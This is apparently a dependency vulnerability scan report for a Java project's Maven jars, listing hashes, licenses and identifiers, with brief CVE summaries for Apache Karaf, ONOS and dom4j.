File Path: /Users/Kevin/.m2/repository/io/netty/netty-transport/4.1.8.Final/netty-transport-4.1.8.Final.jar
MD5: 3d75a3e599aa9739e10a7aa191c3b00c
SHA1: 905b5dadce881c9824b3039c0df36dabbb7b6a07
SHA256: 6581c964501166daeb62792edf2a1f1ad63e348dd02b9ab228efd8ed3cce2d4a
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: io.netty:netty-transport:4.1.8.Final  Confidence: Highest
  • cpe: cpe:/a:netty_project:netty:4.1.8  Confidence: Low

objenesis-2.6.jar

Description:

 A library for instantiating Java objects

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/objenesis/objenesis/2.6/objenesis-2.6.jar
MD5: 5ffac3f51405ca9b2915970a224b3e8f
SHA1: 639033469776fd37c08358c6b92a4761feb2af4b
SHA256: 5e168368fbc250af3c79aa5fef0c3467a2d64e5a7bd74005f25d8399aeb0708d
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.objenesis:objenesis:2.6  Confidence: Highest

org.apache.felix.scr-1.8.2.jar

Description:

Implementation of the Declarative Services specification 1.2

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/felix/org.apache.felix.scr/1.8.2/org.apache.felix.scr-1.8.2.jar
MD5: ce9db4e6958cbd7e555cec48fdcd35fc
SHA1: c3047d56ee57de0752821fd9c3894dda664f2e37
SHA256: 19d395d8800d5546397211edc209e2e42d0ee500c93aca9d04ce69e4288f41d9
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.felix:org.apache.felix.scr:1.8.2  Confidence: Highest

org.apache.felix.scr.annotations-1.9.12.jar

Description:

Annotations for generating OSGi service descriptors.

File Path: /Users/Kevin/.m2/repository/org/apache/felix/org.apache.felix.scr.annotations/1.9.12/org.apache.felix.scr.annotations-1.9.12.jar
MD5: e229f035b91f99b188304c7d493125d9
SHA1: 5fdc34da641dda8b9165c2be93211479a186da9c
SHA256: c1d6895b5f45351dfbc4290698aeab00ad013339067abfbe73c047b795e72c47
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.felix:org.apache.felix.scr.annotations:1.9.12  Confidence: Highest

jansi-1.11.jar

Description:

 Jansi is a java library for generating and interpreting ANSI escape sequences.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/fusesource/jansi/jansi/1.11/jansi-1.11.jar
MD5: e8bd19df14afe8a0f4e2a44d57c0cd8b
SHA1: 655c643309c2f45a56a747fda70e3fadf57e9f11
SHA256: 9e82163ed2fc6257fe627132ce554726e796edee4e5efe9d9e523aee217d60b8
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.fusesource.jansi:jansi:1.11  Confidence: Highest

jline-2.13.jar

License:

The BSD License: http://www.opensource.org/licenses/bsd-license.php
File Path: /Users/Kevin/.m2/repository/jline/jline/2.13/jline-2.13.jar
MD5: f251ba666cccb260ff7215b2cbeee8d4
SHA1: 2d9530d0a25daffaffda7c35037b046b627bb171
SHA256: a6d2c9c0ddff7702662073b69c6dc4ec83011d22e4eb2dada28aa2d66ee47f97
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: jline:jline:2.13  Confidence: Highest

org.apache.felix.fileinstall-3.5.2.jar

Description:

 A utility to automatically install bundles from a directory.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/felix/org.apache.felix.fileinstall/3.5.2/org.apache.felix.fileinstall-3.5.2.jar
MD5: 0d776d72e918612e16004bab2d22eea2
SHA1: 69e816d6d24a1c5807924ba572c62c26e5e64102
SHA256: ac9074e2d92327384d06b5fabaf1c2e81f0f116a7b237b93f3170bb20b24518d
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.felix:org.apache.felix.fileinstall:3.5.2  Confidence: Highest

sshd-core-0.14.0.jar

Description:

The Apache Software Foundation provides support for the Apache community of open-source software projects. The Apache projects are characterized by a collaborative, consensus based development process, an open and pragmatic software license, and a desire to create high quality software that leads the way in its field. We consider ourselves not simply a group of projects sharing a server, but rather a community of developers and users.

License:

http://www.apache.org/licenses/LICENSE-2.0
File Path: /Users/Kevin/.m2/repository/org/apache/sshd/sshd-core/0.14.0/sshd-core-0.14.0.jar
MD5: 8bcae42c76576a8cfc39db56d7418e37
SHA1: cb12fa1b1b07fb5ce3aa4f99b189743897bd4fca
SHA256: cbbc0ea7ce78572770185acbaa684af809025e2e32c948de57e0d3fb936d7b55
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.sshd:sshd-core:0.14.0  Confidence: Highest

org.apache.karaf.system.core-3.0.8.jar

Description:

This bundle provides services to manipulate the Karaf container itself (system).

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/karaf/system/org.apache.karaf.system.core/3.0.8/org.apache.karaf.system.core-3.0.8.jar
MD5: 00dd26737f49950467381b32473e7ebf
SHA1: 80378de4aeae603889d3408489ff5b9918e6064c
SHA256: 3e1397c8b09a90ddb591e0815371ffd962d244747c3ddd2dc475f312610cc21b
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.karaf.system:org.apache.karaf.system.core:3.0.8  Confidence: Highest
  • cpe: cpe:/a:apache:karaf:3.0.8  Confidence: Low

CVE-2014-0219

Severity: Low
CVSS Score: 2.1 (AV:L/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

Apache Karaf enables a shutdown port on the loopback interface, which allows local users to cause a denial of service (shutdown) by sending a shutdown command to all listening high ports.

Vulnerable Software & Versions:

xml-apis-1.0.b2.jar

Description:

xml-commons provides an Apache-hosted set of DOM, SAX, and JAXP interfaces for use in other xml-based projects. Our hope is that we can standardize on both a common version and packaging scheme for these critical XML standards interfaces to make the lives of both our developers and users easier. The External Components portion of xml-commons contains interfaces that are defined by external standards organizations. For DOM, that's the W3C; for SAX it's David Megginson and sax.sourceforge.net; for JAXP it's Sun.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/xml-apis/xml-apis/1.0.b2/xml-apis-1.0.b2.jar
MD5: 458715c0f7646a56b1c6ad3138098beb
SHA1: 3136ca936f64c9d68529f048c2618bd356bf85c9
SHA256: 8232f3482c346d843e5e3fb361055771c1acc105b6d8a189eb9018c55948cf9f
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: xml-apis:xml-apis:1.0.b2  Confidence: Highest

org.apache.servicemix.bundles.dom4j-1.6.1_5.jar

Description:

 This OSGi bundle wraps ${pkgArtifactId} ${pkgVersion} jar file.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/servicemix/bundles/org.apache.servicemix.bundles.dom4j/1.6.1_5/org.apache.servicemix.bundles.dom4j-1.6.1_5.jar
MD5: 23883e3957d1ca226220db6f9c2964bb
SHA1: f5da21ae9508008f7b28001983adc143cb310ad7
SHA256: 15abe1ccad24f4fd71a926959f1acd64d84878348deee12dcf4928ee4f1db3d5
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.servicemix.bundles:org.apache.servicemix.bundles.dom4j:1.6.1_5  Confidence: Highest
  • cpe: cpe:/a:dom4j_project:dom4j:1.6.1.5  Confidence: Low

org.osgi.compendium-5.0.0.jar

Description:

OSGi Compendium Release 5, Interfaces and Classes for use in compiling bundles.

License:

Apache License, Version 2.0: http://opensource.org/licenses/apache2.0.php
File Path: /Users/Kevin/.m2/repository/org/osgi/org.osgi.compendium/5.0.0/org.osgi.compendium-5.0.0.jar
MD5: 9536e0ce63ca8c06eacec820c88fccf7
SHA1: 9d7a9c35591f6fa1c98ac85af32775c12361aee4
SHA256: f1ef32cc1530f4e66aac606c24363b627ace4780a7737b045bfb3b908d801bcd
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.osgi:org.osgi.compendium:5.0.0  Confidence: Highest
  • maven:  org.osgi : org.osgi.compendium : 5.0.0   Confidence: High

org.osgi.core-5.0.0.jar

Description:

OSGi Service Platform Release 5 Version 5.0, Core Interfaces and Classes for use in compiling bundles.

License:

Apache License, Version 2.0: http://opensource.org/licenses/apache2.0.php
File Path: /Users/Kevin/.m2/repository/org/osgi/org.osgi.core/5.0.0/org.osgi.core-5.0.0.jar
MD5: dce566ce791ffc76e074ff7009d5e795
SHA1: 6e5e8cd3c9059c08e1085540442a490b59a7783c
SHA256: b440c6bff286332afcf5cae067b606962e761c0df00e5fd8a746f0b31265619b
Referenced In Project/Scope: trial:compile

Identifiers

  • maven:  org.osgi : org.osgi.core : 5.0.0   Confidence: High
  • maven: org.osgi:org.osgi.core:5.0.0  Confidence: Highest

reflectasm-1.11.0.jar

Description:

 High performance Java reflection using code generation

License:

New BSD License: http://www.opensource.org/licenses/bsd-license.php
File Path: /Users/Kevin/.m2/repository/com/esotericsoftware/reflectasm/1.11.0/reflectasm-1.11.0.jar
MD5: dc5442d63ff26a0e5d52fbc21a2831ca
SHA1: f747d8b017a26bac575f8da14e8c1df6aecd3154
SHA256: eef46e43a6861cdbb3356295644341a48d9a4c1cf753eb5f03cf7bff3a07d180
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: com.esotericsoftware:reflectasm:1.11.0  Confidence: Highest

onlab-misc-1.13.1.jar

File Path: /Users/Kevin/.m2/repository/org/onosproject/onlab-misc/1.13.1/onlab-misc-1.13.1.jar
MD5: 9ce1d887af9b5a5239db89a37a79b075
SHA1: d9fe6097075105ba5f1e8a877bd83f39fd909e03
SHA256: b9780130eeab5196cca32706f22cbb6969373c2fd7a26fcbee9881ca373cbc1c
Referenced In Project/Scope: trial:compile

Identifiers

CVE-2018-1000614  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

ONOS ONOS Controller version 1.13.1 and earlier contains an XML External Entity (XXE) vulnerability in providers/netconf/alarm/src/main/java/org/onosproject/provider/netconf/alarm/NetconfAlarmTranslator.java that can result in an adversary remotely launching advanced XXE attacks on the ONOS controller without authentication. This attack appears to be exploitable via a crafted protocol message.

Vulnerable Software & Versions:

CVE-2018-1000615  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

ONOS ONOS Controller version 1.13.1 and earlier contains a Denial of Service (service crash) vulnerability in the OVSDB component in ONOS that can result in an adversary remotely crashing the OVSDB service of the ONOS controller via a normal switch. This attack appears to be exploitable when the attacker is able to control or forge a switch in the network.

Vulnerable Software & Versions:

CVE-2018-1000616  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

ONOS ONOS controller version 1.13.1 and earlier contains an XML External Entity (XXE) vulnerability in onos\drivers\utilities\src\main\java\org\onosproject\drivers\utilities\XmlConfigParser.java loadxml() that can result in an adversary remotely launching XXE attacks on the ONOS controller via an OpenConfig Terminal Device. This attack appears to be exploitable via network connectivity.

Vulnerable Software & Versions:

lucene-analyzers-common-7.0.1.jar

Description:

 Additional Analyzers

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-analyzers-common/7.0.1/lucene-analyzers-common-7.0.1.jar
MD5: ea1472f430211c927563e47672a0bd3d
SHA1: 5f6b74b083e5925b00bb89a1146c76c9a0b208e0
SHA256: f431e9c0b398c3dfd129e5c27f9badfc67c627de2eada2c786d3db3976213efa
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-analyzers-common:7.0.1  Confidence: Highest

lucene-analyzers-kuromoji-7.0.1.jar

Description:

Lucene Kuromoji Japanese Morphological Analyzer

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-analyzers-kuromoji/7.0.1/lucene-analyzers-kuromoji-7.0.1.jar
MD5: 799b370b1f3979a6dda89d2f19f93e1d
SHA1: f7cc8d5667a915a77d8d75a42082a9bf7a4f90fa
SHA256: 9c8314957013cea7465320646074d10db55171db759a8967c0826c97839f3ee7
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-analyzers-kuromoji:7.0.1  Confidence: Highest

lucene-analyzers-phonetic-7.0.1.jar

Description:

Provides phonetic encoding via Commons Codec.

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-analyzers-phonetic/7.0.1/lucene-analyzers-phonetic-7.0.1.jar
MD5: 8df8c08733c0cba9956c4e809aa86977
SHA1: be14b71ed53e99df493e526fbe9fe56dcf709148
SHA256: 5c73488a63341409ea5131706527272152365ac60538df03f6850cd534861d3e
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-analyzers-phonetic:7.0.1  Confidence: Highest

lucene-backward-codecs-7.0.1.jar

Description:

Codecs for older versions of Lucene.

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-backward-codecs/7.0.1/lucene-backward-codecs-7.0.1.jar
MD5: 0b1e104832688195be096629046ecf63
SHA1: 18638048b965511a490b84c1e2623d396b7b9a3f
SHA256: 012a7bae1663f373b3440b689436abfd90b409b02bece2c57f0a0d9937a11ea9
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-backward-codecs:7.0.1  Confidence: Highest

lucene-classification-7.0.1.jar

Description:

 Lucene Classification

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-classification/7.0.1/lucene-classification-7.0.1.jar
MD5: 664ece05ffe885c286cdf4ad53e26bcf
SHA1: 5487501888b3454d8a6f07900fdf580c7460c7e5
SHA256: bb02948c45705f3f82014058c64cdf7deddb6f8e39506505b6fa16ca5c6391b3
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-classification:7.0.1  Confidence: Highest

lucene-codecs-7.0.1.jar

Description:

Codecs and postings formats for Apache Lucene.

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-codecs/7.0.1/lucene-codecs-7.0.1.jar
MD5: 66c3665c360daa555c81f50f28da356c
SHA1: dbe35cc23b9e6dc1bd73c08363f0ecd02e6e7188
SHA256: 654d0af78360fa9cf7118448565dc0de9e9934c86dded3a5bed34e7adf6d1a8c
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-codecs:7.0.1  Confidence: Highest

lucene-core-7.0.1.jar

Description:

 Apache Lucene Java Core

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-core/7.0.1/lucene-core-7.0.1.jar
MD5: c9f9e9458069a3707efe8ce27af18bbb
SHA1: 3f1ad4670da69cf5b4489b59152dce4eea252ff5
SHA256: 8586ecb0521390097044a150fa71ffa15dbab9745bb96224e4c4ad3b391b4b56
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-core:7.0.1  Confidence: Highest

lucene-expressions-7.0.1.jar

Description:

Dynamically computed values to sort/facet/search on based on a pluggable grammar.

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-expressions/7.0.1/lucene-expressions-7.0.1.jar
MD5: 0e8b7705785225dcf1d0313cef5dabe2
SHA1: 4dee7e95dd1c4fec151ad6604825cdf696b52e88
SHA256: 00a9f7193b99c239b6e62a89cf02caa8e957f423b24f1687a03ff43ad7d8815e
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-expressions:7.0.1  Confidence: Highest

lucene-grouping-7.0.1.jar

Description:

 Lucene Grouping Module

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-grouping/7.0.1/lucene-grouping-7.0.1.jar
MD5: 2056241cda8f992e353b1cfee182155c
SHA1: 6615491d5d2017e0243c2c2e016f92a8ca12db60
SHA256: b4d0ed9dbb046ddce6713c26bd2688038095b8d83647524e890820437fdefa60
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-grouping:7.0.1  Confidence: Highest

lucene-highlighter-7.0.1.jar

Description:

This is the highlighter for apache lucene java

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-highlighter/7.0.1/lucene-highlighter-7.0.1.jar
MD5: 0d3cdaaaf71edbb3be1902cde2c175b6
SHA1: 888bf6b9a1e8bd69931e30c67fc01edd284b4c81
SHA256: 19b90fb993913bb954a320db052aa088798762e9d5c5b20a19f9c11ed43d44ea
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-highlighter:7.0.1  Confidence: Highest

lucene-join-7.0.1.jar

Description:

 Lucene Join Module

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-join/7.0.1/lucene-join-7.0.1.jar
MD5: 8e521d0d356c1b47f7726a837f296451
SHA1: bfa8769171ef4c12d347a094c90a5b314d4d7915
SHA256: 411645c64129e101abe37e3fdc29ee6d09a2cbde0d2632384d2201a6133cc96b
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-join:7.0.1  Confidence: Highest

lucene-memory-7.0.1.jar

Description:

High-performance single-document index to compare against Query

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-memory/7.0.1/lucene-memory-7.0.1.jar
MD5: 5fa48c7b1a2513ba8479988814c657fe
SHA1: c9bdc376260a5c94318085f6b5ba932cfdd51ad8
SHA256: 412729936c08114ed4ebec966e8af599eb3402a55dce322184ec92861b6333fe
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-memory:7.0.1  Confidence: Highest

lucene-misc-7.0.1.jar

Description:

 Miscellaneous Lucene extensions

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-misc/7.0.1/lucene-misc-7.0.1.jar
MD5: f4018cffa28eff63e737bf84d445f3e9
SHA1: c72dd9d63f92f0e82961dd38e169d5affdb915b0
SHA256: d133dcd0110f6a57e7f4a7f94c003edf606e38ce807ff417de00675986aab3e1
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-misc:7.0.1  Confidence: Highest

lucene-queries-7.0.1.jar

Description:

 Lucene Queries Module

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-queries/7.0.1/lucene-queries-7.0.1.jar
MD5: c0706b29d50e357ee1741d46aa8378c4
SHA1: 168e774681469e0d8902680d6cfce0131d6421bf
SHA256: 487a16504e9150a39c239ce5756cd7200e093c29ffbcbfc5c287ccf5a2d0ce3a
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-queries:7.0.1  Confidence: Highest

lucene-queryparser-7.0.1.jar

Description:

 Lucene QueryParsers module

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-queryparser/7.0.1/lucene-queryparser-7.0.1.jar
MD5: fddb96f61a0783f9e0198db3f75227cd
SHA1: 4634a493b78fe7ced32ca34dc107b753a280a276
SHA256: 7ab1623c1dc892c3ba4f935d915dc5e02afb3e411db08a0a2094bbb8e3a8185e
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-queryparser:7.0.1  Confidence: Highest

lucene-sandbox-7.0.1.jar

Description:

 Lucene Sandbox

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-sandbox/7.0.1/lucene-sandbox-7.0.1.jar
MD5: 0ce54aa5d25080af63a8af8e52185b59
SHA1: a379474d929b909b1602ecfd093df8ef70f76776
SHA256: dcd59d03328a7e3b1498b93193c315b1c0973f645c2e4a50be72de5d5e4de59e
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-sandbox:7.0.1  Confidence: Highest

lucene-spatial-extras-7.0.1.jar

Description:

Advanced Spatial Shape Strategies for Apache Lucene

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-spatial-extras/7.0.1/lucene-spatial-extras-7.0.1.jar
MD5: 148633aba66114a8585ccac62e9541eb
SHA1: 86f777596734662402b55e24a2848f0ac4a96628
SHA256: 7b096ee98b185aa916e557e105e1af68fcd2cdc8f38955f328cd5b77a5645cd1
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-spatial-extras:7.0.1  Confidence: Highest

lucene-suggest-7.0.1.jar

Description:

 Lucene Suggest Module

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-suggest/7.0.1/lucene-suggest-7.0.1.jar
MD5: c9c56997504302b075b9703e43d5627d
SHA1: 71cf313010f44841f9cfb70e71559af50ea8198b
SHA256: b6d23085298ae5fce8eabaf8b81f066caa9f30eef52574adb81a343920b7740b
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-suggest:7.0.1  Confidence: Highest

hppc-0.7.1.jar

Description:

High Performance Primitive Collections. Fundamental data structures (maps, sets, lists, stacks, queues) generated for combinations of object and primitive types to conserve JVM memory and speed up execution.

File Path: /Users/Kevin/.m2/repository/com/carrotsearch/hppc/0.7.1/hppc-0.7.1.jar
MD5: 2ff89be5b49144c330190cf7137c3a26
SHA1: 8b5057f74ea378c0150a1860874a3ebdcb713767
SHA256: 40d2a57f59e9eae7b018d3b4841954087ee40a5c1db6a54c3ea87742e3890391
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: com.carrotsearch:hppc:0.7.1  Confidence: Highest

jackson-dataformat-smile-2.5.4.jar

Description:

Support for reading and writing Smile ("binary JSON") encoded data using Jackson abstractions (streaming API, data binding, tree model)

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/fasterxml/jackson/dataformat/jackson-dataformat-smile/2.5.4/jackson-dataformat-smile-2.5.4.jar
MD5: a3868ca8efddfec575b139f574e21dc2
SHA1: db0c5f1b6e16cb5f5e0505abfcd4b36f3e8bfdc6
SHA256: b3deecbe7ba584846b7439d936f9bdd1dd7c62383af8c74044587a77b6484457
Referenced In Project/Scope: trial:compile

Identifiers

  • maven: com.fasterxml.jackson.dataformat:jackson-dataformat-smile:2.5.4  Confidence: Highest
  • cpe: cpe:/a:fasterxml:jackson:2.5.4  Confidence: Low

caffeine-2.4.0.jar

Description:

 A high performance caching library for Java 8+

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/github/ben-manes/caffeine/caffeine/2.4.0/caffeine-2.4.0.jar
MD5: 88d83922414143f7c3c1d12b83ca4d7b
SHA1: 5aa8bbb851b1ad403cc140094ba4a25998369efe
SHA256:a70d0ce267c92820aeb2790720643b3554e09ae7a95b5f5cc5e9c4800fcfab44
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.github.ben-manes.caffeine:caffeine:2.4.0  Confidence:Highest

protobuf-java-3.1.0.jar

Description:

 Core Protocol Buffers library. Protocol Buffers are a way of encoding structured data in an efficient yet extensible format.

License:

http://www.opensource.org/licenses/bsd-license.php
File Path: /Users/Kevin/.m2/repository/com/google/protobuf/protobuf-java/3.1.0/protobuf-java-3.1.0.jar
MD5: 6fcd9d8f757eea48ac7f3e1b279f94e8
SHA1: e13484d9da178399d32d2d27ee21a77cfb4b7873
SHA256:8d7ec605ca105747653e002bfe67bddba90ab964da697aaa5daa1060923585db
Referenced In Project/Scope:trial:compile

Identifiers

t-digest-3.1.jar

Description:

 Data structure which allows accurate estimation of quantiles and related rank statistics

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/tdunning/t-digest/3.1/t-digest-3.1.jar
MD5: ba0c00142170b71bd3ae17d2d7e4e38b
SHA1: 451ed219688aed5821a789428fd5e10426d11312
SHA256:271f3a5a4bc79d7554c9e9e557669af83bcbda0db871e0b8c969d56e51c123a9
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.tdunning:t-digest:3.1  Confidence:Highest

dom4j-1.6.1.jar

Description:

 dom4j: the flexible XML framework for Java

File Path: /Users/Kevin/.m2/repository/dom4j/dom4j/1.6.1/dom4j-1.6.1.jar
MD5: 4d8f51d3fe3900efc6e395be48030d6d
SHA1: 5d3ccc056b6f056dbf0dddfdf43894b9065a8f94
SHA256:593552ffea3c5823c6602478b5002a7c525fd904a3c44f1abe4065c22edfac73
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2018-1000632  

Severity:Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)
CWE: CWE-91 XML Injection (aka Blind XPath Injection)

dom4j version prior to version 2.1.1 contains a CWE-91: XML Injection vulnerability in Class: Element. Methods: addElement, addAttribute that can result in an attacker tampering with XML documents through XML injection. This attack appear to be exploitable via an attacker specifying attributes or elements in the XML document. This vulnerability appears to have been fixed in 2.1.1 or later.

Vulnerable Software & Versions:

gmetric4j-1.0.7.jar

Description:

 JVM instrumentation to Ganglia

License:

The MIT License: http://www.opensource.org/licenses/mit-license.php
File Path: /Users/Kevin/.m2/repository/info/ganglia/gmetric4j/gmetric4j/1.0.7/gmetric4j-1.0.7.jar
MD5: ae36017546569c0312ba11f7b8c369c3
SHA1: 37a1cb0d8821cad9bd33f1ce454459fed18efa44
SHA256:b71d7e1ad919506385f4489084a05bf02a7fbda0b7eeb151fc6adae9866c3aba
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: info.ganglia.gmetric4j:gmetric4j:1.0.7  Confidence:Highest

metrics-ganglia-3.2.2.jar

Description:

 A reporter for Metrics which announces measurements to a Ganglia cluster.

License:

http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/io/dropwizard/metrics/metrics-ganglia/3.2.2/metrics-ganglia-3.2.2.jar
MD5: 6998771417e4efe002eaa0f82bd939fb
SHA1: d5bb1883e9b0daf0e4187e558746f5058f4585c1
SHA256:fdae87ba15898e1754c885afab1594962b0bb24e2049ad35b853521b458f7351
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: io.dropwizard.metrics:metrics-ganglia:3.2.2  Confidence:Highest

metrics-graphite-3.2.2.jar

Description:

 A reporter for Metrics which announces measurements to a Graphite server.

License:

http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/io/dropwizard/metrics/metrics-graphite/3.2.2/metrics-graphite-3.2.2.jar
MD5: ba2f49e74fbfbdbb36045755684f896e
SHA1: 908e8cbec1bbdb2f4023334e424c7de2832a95af
SHA256:cb967ecf5d6d88fe08322b8fe64b885ef2ce0e74ed8fc9bfea286e7aad2e6d47
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:graphite_project:graphite:3.2.2  Confidence:Low  
  • maven: io.dropwizard.metrics:metrics-graphite:3.2.2  Confidence:Highest

metrics-jetty9-3.2.2.jar

Description:

 A set of extensions for Jetty 9.1 and higher which provide instrumentation of thread pools, connector metrics, and application latency and utilization.

License:

http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/io/dropwizard/metrics/metrics-jetty9/3.2.2/metrics-jetty9-3.2.2.jar
MD5: 42a436bbd0e679c9e1737ab7bf5dcf75
SHA1: 3fc94d99f41dc3f5be5483c81828138104df4449
SHA256:ee2a8a882b9a0a87d8c76139c409ddf25ebb7c666f8b4da9b1929214302c370d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: io.dropwizard.metrics:metrics-jetty9:3.2.2  Confidence:Highest
  • cpe: cpe:/a:jetty:jetty:3.2.2  Confidence:Low  

metrics-jvm-3.2.2.jar

Description:

 A set of classes which allow you to monitor critical aspects of your Java Virtual Machine using Metrics.

License:

http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/io/dropwizard/metrics/metrics-jvm/3.2.2/metrics-jvm-3.2.2.jar
MD5: 628535c45f493ea53527258e1ddbfe8b
SHA1: 9cbf2030242f7ffb97fae23f8a81421eb8d4ad45
SHA256:bdbe173890c2572ee53fc005a472950150a76a1a038f6114099c67508e559a6c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: io.dropwizard.metrics:metrics-jvm:3.2.2  Confidence:Highest

log4j-1.2.17.jar

Description:

 Apache Log4j 1.2

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/log4j/log4j/1.2.17/log4j-1.2.17.jar
MD5: 04a41f0a068986f0f73485cf507c0f40
SHA1: 5af35056b4d257e4b64b9e8069c0746e8b08629f
SHA256:1d31696445697720527091754369082a6651bd49781b6005deb94e56753406f9
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:log4j:1.2.17  Confidence:Low  
  • maven: log4j:log4j:1.2.17  Confidence:Highest

eigenbase-properties-1.1.5.jar

Description:

 Type-safe access to Java system properties

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/net/hydromatic/eigenbase-properties/1.1.5/eigenbase-properties-1.1.5.jar
MD5: 74250b1aa57ff13507bf28c09e5299eb
SHA1: a941956b3a4664d0cf728ece06ba25cc2110a3aa
SHA256:9394a752411d9729a083cf578ed9666ec9a7f59c18c9ca889127480a44c7285c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.hydromatic:eigenbase-properties:1.1.5  Confidence:Highest

antlr4-runtime-4.5.1-1.jar

Description:

 The ANTLR 4 Runtime

License:

http://www.antlr.org/license.html
File Path: /Users/Kevin/.m2/repository/org/antlr/antlr4-runtime/4.5.1-1/antlr4-runtime-4.5.1-1.jar
MD5: c57e3c5fd251603e1d815ec1d6fde69b
SHA1: 66144204f9d6d7d3f3f775622c2dd7e9bd511d97
